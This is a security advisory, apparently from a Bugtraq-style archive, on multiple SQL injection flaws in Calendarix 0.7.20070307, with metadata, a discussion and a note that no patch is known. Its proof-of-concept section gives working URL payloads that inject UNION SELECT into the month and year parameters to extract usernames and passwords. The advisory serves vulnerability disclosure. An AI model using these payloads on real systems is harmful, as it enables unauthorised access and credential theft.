Calendarix Multiple SQL Injection Vulnerabilities
BID:24633
Info
Calendarix Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 24633 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3183 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 25 2007 12:00AM |
| Updated: | Jun 26 2007 05:28PM |
| Credit: | Jesper Jurcenoks is credited with the discovery of this vulnerability. |
| Vulnerable: |
Calendarix Calendarix 0.7.20070307 |
| Not Vulnerable: | |
Discussion
Calendarix Multiple SQL Injection Vulnerabilities
Calendarix is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Calendarix 0.7.20070307; other versions may also be affected.
Calendarix is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Calendarix 0.7.20070307; other versions may also be affected.
Exploit / POC
Calendarix Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proofs of concept are available:
http://www.example.com/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23
http://www.example.com/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23
Attackers can use a browser to exploit these issues.
The following proofs of concept are available:
http://www.example.com/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23
http://www.example.com/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23
Solution / Fix
Calendarix Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
Calendarix Multiple SQL Injection Vulnerabilities
References:
References: